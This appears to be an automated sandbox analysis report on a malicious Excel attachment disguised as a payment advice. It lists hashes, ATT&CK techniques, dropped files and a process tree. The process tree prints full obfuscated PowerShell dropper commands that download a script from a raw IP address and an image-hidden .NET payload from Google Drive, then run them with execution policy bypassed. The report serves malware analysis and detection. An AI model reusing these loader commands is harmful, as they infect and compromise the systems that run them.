b9a1aa0417bb7c55a9320c9c6919bf56559bb6cb8064ff087e23bf54e66caf55

Analysis

max time kernel
107s
max time network
125s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
06/11/2024, 15:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Payment Advice-RefA22D4YdWsbE56.xla.xls
Size

1.1MB
MD5

93019ec4bf2082a11f1324fb0f69f6bb
SHA1

0b8890cb852598a7fbd51c77d99de803a6b694fa
SHA256

b9a1aa0417bb7c55a9320c9c6919bf56559bb6cb8064ff087e23bf54e66caf55
SHA512

138ea5ccbf18782bdbe4995008268129825bbf4c82a1ae93afd02f874ce047cbc07482f432919ef536000c5e1bafd3b0c9727f04aa038be0ec881f71456942de
SSDEEP

24576:/yaZxvseowaDIOpUqvBw2L5Lxxg3mJ/Qga9NmAvOJZ:/T0DIOLvBwC5Lrg3mJIg4O

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
22	2424	mshta.exe
23	2424	mshta.exe
25	2516	poWERSHElL.EXe
27	2828	powershell.exe
29	2828	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1608	powershell.exe
2828	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
844	powershell.exe
2516	poWERSHElL.EXe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	drive.google.com
27	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	poWERSHElL.EXe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	poWERSHElL.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
392	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2516	poWERSHElL.EXe
844	powershell.exe
2516	poWERSHElL.EXe
2516	poWERSHElL.EXe
1608	powershell.exe
2828	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2516	poWERSHElL.EXe
Token: SeDebugPrivilege	844	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	2828	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
392	EXCEL.EXE
392	EXCEL.EXE
392	EXCEL.EXE
392	EXCEL.EXE
392	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2424 wrote to memory of 2516	2424	mshta.exe	31
PID 2424 wrote to memory of 2516	2424	mshta.exe	31
PID 2424 wrote to memory of 2516	2424	mshta.exe	31
PID 2424 wrote to memory of 2516	2424	mshta.exe	31
PID 2516 wrote to memory of 844	2516	poWERSHElL.EXe	34
PID 2516 wrote to memory of 844	2516	poWERSHElL.EXe	34
PID 2516 wrote to memory of 844	2516	poWERSHElL.EXe	34
PID 2516 wrote to memory of 844	2516	poWERSHElL.EXe	34
PID 2516 wrote to memory of 1988	2516	poWERSHElL.EXe	35
PID 2516 wrote to memory of 1988	2516	poWERSHElL.EXe	35
PID 2516 wrote to memory of 1988	2516	poWERSHElL.EXe	35
PID 2516 wrote to memory of 1988	2516	poWERSHElL.EXe	35
PID 1988 wrote to memory of 1560	1988	csc.exe	36
PID 1988 wrote to memory of 1560	1988	csc.exe	36
PID 1988 wrote to memory of 1560	1988	csc.exe	36
PID 1988 wrote to memory of 1560	1988	csc.exe	36
PID 2516 wrote to memory of 884	2516	poWERSHElL.EXe	37
PID 2516 wrote to memory of 884	2516	poWERSHElL.EXe	37
PID 2516 wrote to memory of 884	2516	poWERSHElL.EXe	37
PID 2516 wrote to memory of 884	2516	poWERSHElL.EXe	37
PID 884 wrote to memory of 1608	884	WScript.exe	38
PID 884 wrote to memory of 1608	884	WScript.exe	38
PID 884 wrote to memory of 1608	884	WScript.exe	38
PID 884 wrote to memory of 1608	884	WScript.exe	38
PID 1608 wrote to memory of 2828	1608	powershell.exe	40
PID 1608 wrote to memory of 2828	1608	powershell.exe	40
PID 1608 wrote to memory of 2828	1608	powershell.exe	40
PID 1608 wrote to memory of 2828	1608	powershell.exe	40

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Payment Advice-RefA22D4YdWsbE56.xla.xls"
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:392

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2424
- C:\Windows\SysWOW64\winDOwSPOWERsHeLl\v1.0\poWERSHElL.EXe
  "C:\Windows\SySTEM32\winDOwSPOWERsHeLl\v1.0\poWERSHElL.EXe" "poWErSheLl.EXe -Ex ByPAsS -noP -W 1 -c DEviCECReDEntiaLdeployMeNT ; iEx($(IEX('[SYStEm.tExT.eNCoDiNG]'+[CHAR]58+[chAR]58+'UTf8.GEtSTRinG([SYSTem.convERT]'+[char]58+[char]0x3a+'FRoMbaSe64string('+[chAr]34+'JEY2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUkRFZkluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSmtnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVudktEYVVrdUgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWG9XdEQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRpaVh2ZEYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNWWNsQ2xJSEdibiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbk51UElVamZUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRGNjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC4yMy83OS9zZWV0aGViZXN0dGhpbmdzd2l0aGdyZWF0bWFnaWNhbHRoaW5nc3dpdGhoZXJsb3Zlci50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhncmVhdG1hZ2ljYWx0aGluZ3N3aXRoaGUudmJzIiwwLDApO3NUYXJULXNMRWVQKDMpO1NUYVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzd2l0aGdyZWF0bWFnaWNhbHRoaW5nc3dpdGhoZS52YnMi'+[ChAR]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2516
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAsS -noP -W 1 -c DEviCECReDEntiaLdeployMeNT
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:844
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2fdziwdk.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1988
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9187.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9186.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1560
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgreatmagicalthingswithhe.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:884
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCcxamdpbScrJ2FnZVVybCA9IDViSmh0dHBzOi8nKycvZHJpdmUuZ29vZ2xlLmMnKydvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQnKyc9MVV5SHF3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwIDViSjsxamd3ZWJDbGllbnQgPSBOZScrJ3ctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OzFqJysnZ2ltYWdlQnl0ZXMgPSAxamd3ZWJDbGllbnQuRG93bmxvYWREYXRhKDFqZ2ltYWdlVXJsKTsxamdpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOicrJzpVVEY4LkdldFN0cmluZygxamdpbWFnZUJ5JysndGVzKTsxamdzdGFydEZsYWcgPSAnKyc1Yko8PEJBU0U2NF9TVEFSVD4+NWJKOzFqZ2VuZEZsYWcgPSA1Yko8PCcrJ0JBU0U2NF9FTkQ+PjViSjsxamdzdGFydEluZGV4ID0nKycgMWpnaW1hZ2VUZXh0LicrJ0knKyduZGV4T2YoMWpnc3RhcnRGbGFnKTsxamdlbmRJbmRleCA9IDFqZ2knKydtYWdlVGV4dC5JbmRleE8nKydmKDFqZ2VuZEZsYWcpOzFqZ3N0YXJ0SW5kZXggLWdlICcrJzAgLWFuZCAxamdlbmRJbmRleCAtZ3QgMWpnc3RhcnRJbmRleDsxamdzdGFydEluZGV4ICs9IDFqZ3N0YXJ0RmxhZy5MZW5ndGg7MWpnYmFzZTY0JysnTGVuZ3RoID0gMWpnZW5kSW5kZXggLSAxamdzdGFydEluZGV4OzFqZ2JhJysnc2U2NENvbW1hbmQgPSAxamdpbWFnZVRleHQuU3Vic3RyaW5nJysnKDFqZ3N0YXJ0SW5kZXgsIDFqZ2Jhc2U2NExlbmd0aCk7MWpnYmFzZTY0UmV2ZScrJ3JzZWQgPSAtam9pbiAoMWpnYmFzZTY0Q29tbWEnKyduZC5Ub0NoYXJBcnJheSgpIDE1biBGb3JFYWNoLU9iamVjdCB7IDFqZ18gfSlbLTEuLi0oMWpnYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTsxamdjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTYnKyc0U3RyaW5nKDFqZ2Jhc2U2NFJldmVyc2VkKTsxamdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06JysnOkxvYWQoMWpnY29tbWFuZEJ5dGVzKTsxamd2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDViSlZBSTViSik7MWpndmFpTWV0aG8nKydkLkludm9rZSgxamdudWxsLCBAKDViSnR4dC5GQ0RSVy85Ny8zMi40LjM3MS43MDEvLzpwdHRoNWJKLCA1YkpkZXNhdGl2YWRvNWJKLCA1YkpkZXNhdGl2YWRvNWJKLCA1YicrJ0pkZXNhdGl2YWRvNWJKLCA1Ykphc3BuZXRfY29tcGlsZXI1YkosIDViSmRlc2F0aXZhZG81YkosIDViSmRlc2F0aXZhZG81YkosNWJKZGVzYXRpdmFkbzViSiw1YkpkZXNhdGl2YWRvNWJKLDViSmRlc2F0aXZhZG81YkosNWJKZGVzYXRpdmFkbzViSiw1YkpkZXNhdGl2YWRvNWJKLDViSjE1YkosNWJKZGVzYXRpdmFkbzViSikpOycpLlJlcGxhY0UoJzViSicsW1NUcklOZ11bQ2hhUl0zOSkuUmVwbGFjRSgoW0NoYVJdNDkrW0NoYVJdNTMrW0NoYVJdMTEwKSxbU1RySU5nXVtDaGFSXTEyNCkuUmVwbGFjRSgoW0NoYVJdNDkrW0NoYVJdMTA2K1tDaGFSXTEwMyksJyQnKXwgJiAoKGd2ICcqbWRyKicpLm5hTWVbMywxMSwyXS1KT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1608
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('1jgim'+'ageUrl = 5bJhttps:/'+'/drive.google.c'+'om/uc?export=download&id'+'=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 5bJ;1jgwebClient = Ne'+'w-Object System.Net.WebClient;1j'+'gimageBytes = 1jgwebClient.DownloadData(1jgimageUrl);1jgimageText = [System.Text.Encoding]:'+':UTF8.GetString(1jgimageBy'+'tes);1jgstartFlag = '+'5bJ<<BASE64_START>>5bJ;1jgendFlag = 5bJ<<'+'BASE64_END>>5bJ;1jgstartIndex ='+' 1jgimageText.'+'I'+'ndexOf(1jgstartFlag);1jgendIndex = 1jgi'+'mageText.IndexO'+'f(1jgendFlag);1jgstartIndex -ge '+'0 -and 1jgendIndex -gt 1jgstartIndex;1jgstartIndex += 1jgstartFlag.Length;1jgbase64'+'Length = 1jgendIndex - 1jgstartIndex;1jgba'+'se64Command = 1jgimageText.Substring'+'(1jgstartIndex, 1jgbase64Length);1jgbase64Reve'+'rsed = -join (1jgbase64Comma'+'nd.ToCharArray() 15n ForEach-Object { 1jg_ })[-1..-(1jgbase64Command.Length)];1jgcommandBytes = [System.Convert]::FromBase6'+'4String(1jgbase64Reversed);1jgloadedAssembly = [System.Reflection.Assembly]:'+':Load(1jgcommandBytes);1jgvaiMethod = [dnlib.IO.Home].GetMethod(5bJVAI5bJ);1jgvaiMetho'+'d.Invoke(1jgnull, @(5bJtxt.FCDRW/97/32.4.371.701//:ptth5bJ, 5bJdesativado5bJ, 5bJdesativado5bJ, 5b'+'Jdesativado5bJ, 5bJaspnet_compiler5bJ, 5bJdesativado5bJ, 5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJ15bJ,5bJdesativado5bJ));').ReplacE('5bJ',[STrINg][ChaR]39).ReplacE(([ChaR]49+[ChaR]53+[ChaR]110),[STrINg][ChaR]124).ReplacE(([ChaR]49+[ChaR]106+[ChaR]103),'$')| & ((gv '*mdr*').naMe[3,11,2]-JOIN'')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2828

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

Filesize
1KB

MD5
65224702aeab472672d0a9447a74e4cc

SHA1
d050b4c9431788019fd7401d001918b67de47d69

SHA256
135ce0b190b178e305f282e798bb65e91b158ac89ab792f2d47046447b44db58

SHA512
33446ad63bb0ca6e6474c29a15a6d2a32bb26e9f612310679a39fb5d58ac095ca8e0ef926c64cefacf327bf4aadf7304a35cb7816bd0eaf9fb050c6ef144acc3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

Filesize
2KB

MD5
27792018d2dfa32170c1d9a91a157c1b

SHA1
311f869b28c7a40a7b31d05a221e8cef814ccd6f

SHA256
1e0cfe33f2593616924c9ea30e5659702e617b15f8533a2fc669cc2b56e7172f

SHA512
5059a9a194b20e4b53c996f8e12c8e048665e3c1bd48815aff3113f8b4b40796313010c9b450fd9dc9ced366580b0978f2cf1315467f94b81f16c4c36757ce2a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

Filesize
1KB

MD5
97e0d8ad6ce55cb46074b6b0d50ae50c

SHA1
ddaf47c9f6b3f2534a24e44ba0117a10fa0ec084

SHA256
0013a2eb2d16ba6e1b786c946e4281b8ed34f8c5213b4dcca6b3ec326f5374b5

SHA512
04c2902c747c711d1494501d579220de896531cb0518e2971c58c207b22b973b26af2fcf27798cc2955dee266eb5d1c7c1327bb6b9e0cad826725e41138a9158

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F53EB4E574DE32C870452087D92DBEBB_2EEDDB29953A46217D3D6BE21EA36A5B

Filesize
471B

MD5
8955bb560abf515e94ca68dd87ef93b4

SHA1
edfe758796fd694f425d843c9d68689485743a4d

SHA256
e8da732b763426bd055a381d3647dc506f3c5d14fe0bf6e0b174c2365306c3c4

SHA512
ce74e7a1fd0b5baa6781d54dca087e81b8f9f68582ca935a40fd235510ed15ce8351561d8bda74f584a01225e63e5bcf99dd16953c8efb03064435aad7153173

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

Filesize
434B

MD5
38907fd77e444d26b7f3899060f4170a

SHA1
bf502f893a64b979e91f9987fb42d164cb4924e6

SHA256
646af8f119fb8d775e6438212b835bdc061feb1626d81740d9f13511fa53310f

SHA512
d6500112bb263e2d12096d8b5d5e7ee0e00a6715fa952e591f0d9ff0955b2fa59f25df381f6431fc1c016ed08a300545ec86845a451788b2d303ee117b7a8d5c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3b9a75a65b0d1967d81e5f36c7001d00

SHA1
96fd139ff4b28aae19ce07d6887d7a2f61ea8b16

SHA256
35cebeda68d123313566c7f312e1d9901a3356b0be9bc55fcbd5f1c52a122665

SHA512
013db03ec89569b4c0b9d9410d95087fc0982bb322e7c82bb7822f950ca3dc261c969e38500e93909639da9c76cdf7c1247966d6d762766927ba1ac01eb68334

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
0c86986b3131e5e7cabb01e8e505a866

SHA1
f08fc981b325eb93cab598ca29e5da5a41bca7bf

SHA256
0ed32affb76e3f1ee00bd903364b1599982add2fa90c52f0ad7162311c9d6836

SHA512
b5c0e2d7e35b90735a564feeee1df601faea2ea1efc12a105e67882c7b824f9bc6bfd25705ee53e69c9fa1289198b0e7ffe903202e0aeb19bcd840c1b5aba145

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

Filesize
458B

MD5
0f39cd3ceb2bff9a04da08bb7f864e70

SHA1
941f3c86e5c78aec1eee34063addc6307061dbd7

SHA256
549c1abcf3b1c070e5c196a9ca42f23dbeb601f957872fb8de779e9f1f795848

SHA512
2e68cd075970ec62f1317706d62ca21d8a16e6ea8941bda13634684f4816793755164e680d635c0f8df61c36c9509440d7f161aa251e15322fdef54fc98dc125

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

Filesize
432B

MD5
e462815c05b9e28f5732d3c12f1ea280

SHA1
147a6ff511fa41bc88a6a4fe53cf1b7d813d2175

SHA256
883e8f907a64e353d637de7a50ed621d25bf1172185268ddf046d079a15ff30e

SHA512
77b8ca578e72b02f587c1a32bf35d2be6e857afd193c16011a3a33ef36877aa99f8c3c2395b7eab01c1222d15f6fb90358dfa19da7896dfa7e3a56843bbdf8b7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F53EB4E574DE32C870452087D92DBEBB_2EEDDB29953A46217D3D6BE21EA36A5B

Filesize
426B

MD5
35ea93c15d43b672ac2f10b71a74b24b

SHA1
e86a7eb8f29d665fbf9ea0dacd6951efc0f35a2f

SHA256
37cececab90138f4e12d3feae6376b04999b16da0c091df67849c4bde7b988eb

SHA512
369d5942a9d28dca47709b47d74b403135fa125994052e328dc2a87f2d3debe0af59a5ff923e8d13df284a14a9fe57453a17a3b065de029a96adb068eaf0ce7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUME8XYE\greatthingswithmegreatloverherehavewithmegreat[1].hta

Filesize
8KB

MD5
46cb062c22d15cc73b1d8d4dea8c9e83

SHA1
1b61e8e14d45de9b3c9efa8d9dabeec53b16f902

SHA256
928b1afb1969451929cefaebe37de6dbcfa7a227126690d8d41c5ddbad43f4d6

SHA512
3994651b2cefd6000317bedc838ae786d292509dcfc057bfd50f201a7c5eac41bb0dfbc3f853562a922a57635ebc2d283a365dbef8c894330ce3e93a12523e5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\2fdziwdk.dll

Filesize
3KB

MD5
aabb318a51a03f744e272c7cf0cf83ca

SHA1
0080c53d94312d2329217ff1321e8e6a59869521

SHA256
1d46747aefe00d4c73c3607b3ec254422c3e8da6f494c9fc567adb45c7c3c8cb

SHA512
